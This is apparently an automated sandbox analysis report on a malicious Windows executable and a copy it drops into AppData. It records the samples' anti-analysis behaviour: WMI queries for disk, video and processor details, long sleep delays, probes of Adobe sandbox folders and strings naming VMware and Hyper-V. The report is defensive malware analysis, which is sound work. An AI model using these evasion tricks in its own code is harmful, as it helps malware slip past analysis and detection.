                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    barindex
                    Yara detected AntiVM3
                    Source: Yara matchFile source: Process Memory Space: lZ8NRWShfC.exe PID: 6884, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: TmfmVKU.exe PID: 7308, type: MEMORYSTR
                    Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                    Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeMemory allocated: 2D00000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeMemory allocated: 2EB0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeMemory allocated: 4EB0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeMemory allocated: 6310000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeMemory allocated: 7310000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeMemory allocated: 7550000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeMemory allocated: 8550000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeMemory allocated: 1060000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeMemory allocated: 2A50000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeMemory allocated: 4A50000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeMemory allocated: 1A60000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeMemory allocated: 3330000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeMemory allocated: 3140000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeMemory allocated: 66B0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeMemory allocated: 76B0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeMemory allocated: 66B0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeMemory allocated: 2A50000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeMemory allocated: 2BE0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeMemory allocated: 4BE0000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5615Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5826Jump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeWindow / User API: threadDelayed 3408Jump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeWindow / User API: threadDelayed 3833Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeWindow / User API: threadDelayed 1632
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeWindow / User API: threadDelayed 6585
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exe TID: 6924Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6328Thread sleep count: 5615 > 30Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7256Thread sleep time: -4611686018427385s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6328Thread sleep count: 259 > 30Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7180Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7252Thread sleep time: -3689348814741908s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7172Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exe TID: 7540Thread sleep time: -24903104499507879s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exe TID: 7328Thread sleep time: -30000s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exe TID: 7276Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exe TID: 7368Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exe TID: 7936Thread sleep time: -22136092888451448s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exe TID: 7696Thread sleep time: -30000s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exe TID: 7664Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeFile opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\NULLJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeFile opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbxJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeFile opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\Adobe\NULLJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeFile opened: C:\Users\user\AppData\Local\Temp\acrocef_low\NULLJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeFile opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\AdobeJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeFile opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\Adobe\AcrobatJump to behavior
                    Source: TmfmVKU.exe, 0000000A.00000002.1854827025.0000000001432000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                    Source: TmfmVKU.exe, 0000000E.00000002.1964139932.0000000000FF9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllg
                    Source: lZ8NRWShfC.exe, 00000008.00000002.1871636462.0000000000EDA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
